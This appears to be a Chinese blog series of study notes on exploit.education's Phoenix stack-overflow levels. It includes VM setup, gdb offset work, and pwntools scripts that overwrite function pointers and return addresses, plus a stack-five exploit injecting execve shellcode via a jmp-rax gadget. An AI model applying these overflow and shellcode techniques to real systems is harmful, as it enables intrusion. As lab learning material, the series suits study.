BuringStraw

[pwn笔记2]stack-three, stack-four, stack-five(Phoenix)

buringstraw@newsletter.paragraph.com (BuringStraw) — Fri, 24 Mar 2023 07:14:37 GMT

最近又是数模又是开学的，很难受，还是看看远方的水入门题吧。没有动态基址，还是比较简单的。

（写这段的时候还没想到接下来还有概率论考试，还打了场ctf校赛，所以。。。）

stack-three

覆盖一个即将被调用的函数指针的数据，跟前面差不多。

from pwn import *
shell = ssh("user", "localhost", password="user", port=2222)

s = b"a" * 0x40 + p64(0x40069d)
sh = shell.run(b"/opt/phoenix/amd64/stack-three")
sh.recvlines(1)
sh.sendline(s)
print(sh.recvlines(2))

stack-four

覆盖栈上的返回地址。

notion image

0x648-0x5f0=88

from pwn import *
shell = ssh("user", "localhost", password="user", port=2222)

s = b"a" * 88 + p64(0x40061d)
sh = shell.run(b"/opt/phoenix/amd64/stack-four")
sh.recvlines(1)
sh.sendline(s)
print(sh.recvlines(2))

stack-five

需要拿到shell。由于栈是可执行的，可以利用gets来把shellcode读进来，覆盖返回地址来执行shellcode。

这个过程看起来非常完美，可是不知道为什么返回到栈上执行两步就会段错误。关掉了aslr，尝试了附加调试和取消gdb环境变量，以消除栈地址的变化，都没有进展。

后来看到了另一个方法：

调用gets之前，s被放入了rax中。所以直接把shellcode放到最前面就会被rax指向。

我们可以用rop，找到一段jmp rax，返回到那里，然后下一步就会跳到shellcode了。

from pwn import *
shell = ssh("user", "localhost", password="user", port=2222)

total = 136
sc = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
jmp_rax = p64(0x400481)
s = sc+b"a"*(total-len(sc))+jmp_rax

sh = shell.run(b"/opt/phoenix/amd64/stack-five")
sh.recvlines(1)
sh.sendline(s)
sh.interactive()

还有一件事，gef可以用以下命令调整context里stack显示的行数

gef config context.nb_lines_stack 20

这样就不用在虚拟机里再装个peda了（这两个共存很卡）。

[pwn笔记1]stack-one和stack-two (Phoenix)

buringstraw@newsletter.paragraph.com (BuringStraw) — Fri, 24 Mar 2023 07:11:00 GMT

这两道非常简单，而且只有数据读入方式的区别。跟zero一样，只是对覆盖的数据有要求。

Unsupported embedstack-one

将程序第一个参数strcpy到字符串。

notion image

在gdb中run后面直接接参数即可带上参数。

pwntools的sh.run可以接收字节数组作为参数，里面可包含启动参数。（看了下文档，对于run方法：Backward compatibility. Use system() ）

from pwn import *
shell = ssh("user", "localhost", password="user", port=2222)

s = b"a" * 0x40 + p32(0x496c5962)

sh = shell.run(b"/opt/phoenix/amd64/stack-one " + s)
print(sh.recvlines(2))

Unsupported embedstack-two

这次是写到环境变量里。

notion image

做到这里发现环境变量里写"\0"进去会出问题，我们要求写入的是32位数据，不应该用p64，用了就会自动补0，然后报错。

from pwn import *
shell = ssh("user", "localhost", password="user", port=2222)

s = b"a" * 0x40 + p32(0x0d0a090a)
print(s)
s = s.decode()
print(s)
sh = shell.run(b"/opt/phoenix/amd64/stack-two", env={"ExploitEducation": s})
print(sh.recvlines(2))

[pwn笔记0]Phoenix环境搭建和stack-zero

buringstraw@newsletter.paragraph.com (BuringStraw) — Fri, 24 Mar 2023 07:08:52 GMT

找到一个学习pwn的项目http://exploit.education ，决定让我临时抱佛脚学的pwn走向正轨，试试开个笔记系列（每次pwntools脚本都忘记怎么写），希望不要半路弃坑。定个小目标，至少把Phoenix系列做完吧。

环境配置

首先在more-downloads里下载phoenix的虚拟机系统镜像，根据你的架构选择。这就是靶机。在启动之前，我们需要安装qemu-system-x86 （64位的也在同一个包里（archlinux））

运行boot-balabala.sh启动虚拟机，默认在2222端口开启ssh。用户名和密码都是user。

如果你想使用netcat来转发里面的程序，只需在启动脚本里添加另一个端口转发，这里放网络那一整行为例。

-netdev user,id=unet,hostfwd=tcp:127.0.0.1:2222-:22,hostfwd=tcp:127.0.0.1:3333-:3333

然后在虚拟机里执行

mkfifo io

并创建一个脚本文件（start.sh）

#!/bin/bash
cat io|$1 -i 2>&1|nc -l 3333 > io

然后你就可以通过sh start.sh /opt/phoenix/amd64/stack-zero 这样的方式来开netcat了，端口3333记得要和启动脚本里的匹配。

虚拟机里的gdb默认装了gef但是我不太会用，所以scp了一份peda进去。略过。

宿主机再装个非常方便的pwntools：pip install pwntools

stack-zero

程序比较简单，直接用cutter了。

notion image

（其实exploit.education的网页上给了源码）（开头的注释甚至是个冷笑话草草草）

我们现在要让s溢出到var_10h(changeme)，内容随便。打开gdb，计算一下距离，先随便输入点什么。

notion image

字符串在0x620这里。

notion image

判断语句，changeme在rbp-0x10 这里也就是0x670-0x10

计算0x660-0x620=0x40

那么我们只要输出0x41个a即可

为了练习使用pwntools，写个代码。

这里直接用ssh连了，nc都不需要。

from pwn import *

shell = ssh("user", "localhost", password="user", port=2222)
sh = shell.run("/opt/phoenix/amd64/stack-zero")
print(sh.recvline())
sh.sendline(b"a"*0x41)
print(sh.recvline())
shell.close()

成功

notion image

hello

buringstraw@newsletter.paragraph.com (BuringStraw) — Tue, 21 Mar 2023 01:48:11 GMT

world